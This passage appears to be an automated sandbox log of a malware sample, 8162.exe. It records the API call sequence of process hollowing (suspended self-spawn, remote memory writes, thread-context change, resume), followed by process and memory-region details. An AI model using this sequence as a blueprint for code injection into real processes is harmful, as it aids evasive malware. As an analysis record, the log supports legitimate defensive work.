0x756d5414 [0104.675] GetProcAddress (hModule=0x756c0000, lpProcName="GetStartupInfoA") returned 0x756d0e00 [0104.675] GetProcAddress (hModule=0x756c0000, lpProcName="VirtualProtectEx") returned 0x757545bf [0104.675] GetFileAttributesA (lpFileName="apfHQ") returned 0xffffffff [0104.675] GetFileAttributesA (lpFileName="apfHQ") returned 0xffffffff [0104.675] GetFileAttributesA (lpFileName="apfHQ") returned 0xffffffff [0104.676] RegisterClassExA (param_1=0x18fb5c) returned 0x20c182 [0104.676] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x20208 [0104.695] PostMessageA (hWnd=0x20208, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0104.695] GetMessageA (in: lpMsg=0x18fb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18fb8c) returned 1 [0104.695] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x1a0000 [0104.695] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1a0000, nSize=0x2800 | out: lpFilename="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe") returned 0x2d [0104.696] GetStartupInfoA (in: lpStartupInfo=0x18fab0 | out: lpStartupInfo=0x18fab0*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0104.696] GetCommandLineA () returned="\"C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe\" " [0104.696] CreateProcessA (in: lpApplicationName="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe", lpCommandLine="\"C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fab0*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18fb08 | out: lpCommandLine="\"C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe\" ", lpProcessInformation=0x18fb08*(hProcess=0x70, hThread=0x6c, dwProcessId=0xbb4, dwThreadId=0xbb8)) returned 1 [0104.704] VirtualFree (lpAddress=0x1a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.704] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1a0000 [0104.704] GetThreadContext (in: hThread=0x6c, lpContext=0x1a0000 | out: lpContext=0x1a0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1102ad2, Ebp=0x0, Eip=0x778601c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0104.734] ReadProcessMemory (in: hProcess=0x70, lpBaseAddress=0x7efde008, lpBuffer=0x18fafc, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18fafc*, lpNumberOfBytesRead=0x0) returned 1 [0104.735] VirtualAllocEx (hProcess=0x70, lpAddress=0x400000, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0104.735] NtWriteVirtualMemory (in: ProcessHandle=0x70, BaseAddress=0x400000, Buffer=0x2b0a40*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x2b0a40*, NumberOfBytesWritten=0x0) returned 0x0 [0104.735] NtWriteVirtualMemory (in: ProcessHandle=0x70, BaseAddress=0x401000, Buffer=0x2b0e40*, NumberOfBytesToWrite=0xf600, NumberOfBytesWritten=0x0 | out: Buffer=0x2b0e40*, NumberOfBytesWritten=0x0) returned 0x0 [0104.738] NtWriteVirtualMemory (in: ProcessHandle=0x70, BaseAddress=0x411000, Buffer=0x2c0440*, NumberOfBytesToWrite=0x4a00, NumberOfBytesWritten=0x0 | out: Buffer=0x2c0440*, NumberOfBytesWritten=0x0) returned 0x0 [0104.738] NtWriteVirtualMemory (in: ProcessHandle=0x70, BaseAddress=0x416000, Buffer=0x2c4e40*, NumberOfBytesToWrite=0x1800, NumberOfBytesWritten=0x0 | out: Buffer=0x2c4e40*, NumberOfBytesWritten=0x0) returned 0x0 [0104.739] WriteProcessMemory (in: hProcess=0x70, lpBaseAddress=0x7efde008, lpBuffer=0x2b0b64*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2b0b64*, lpNumberOfBytesWritten=0x0) returned 1 [0104.740] SetThreadContext (hThread=0x6c, lpContext=0x1a0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x4044e2, Ebp=0x0, Eip=0x778601c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0104.740] ResumeThread (hThread=0x6c) returned 0x1 [0104.741] CloseHandle (hObject=0x6c) returned 1 [0104.741] CloseHandle (hObject=0x70) returned 1 [0104.741] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0104.746] ExitProcess (uExitCode=0x0) Process: id = "4" image_name = "8162.exe" filename = "c:\\users\\hjrd1k~1\\appdata\\local\\temp\\8162.exe" page_root = "0x63aa1000" os_pid = "0xbb4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xba0" cmd_line = "\"C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe\" " cur_dir = "C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e539" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 970 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 971 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 972 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 973 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 974 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 975 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 976 start_va = 0x1100000 end_va = 0x1147fff entry_point = 0x1102ad2 region_type = mapped_file name = "8162.exe" filename = "\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe" (normalized: "c:\\users\\hjrd1k~1\\appdata\\local\\temp\\8162.exe") Region: id = 977 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 978 start_va = 0x77850000 end_va = 0x779cffff entry_point = 0x77850000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 979 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 980 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 981 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 982 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 983 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 984 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 985 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 986 start_va = 0x400000 end_va = 0x419fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 987 start_va = 0x1a0000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = 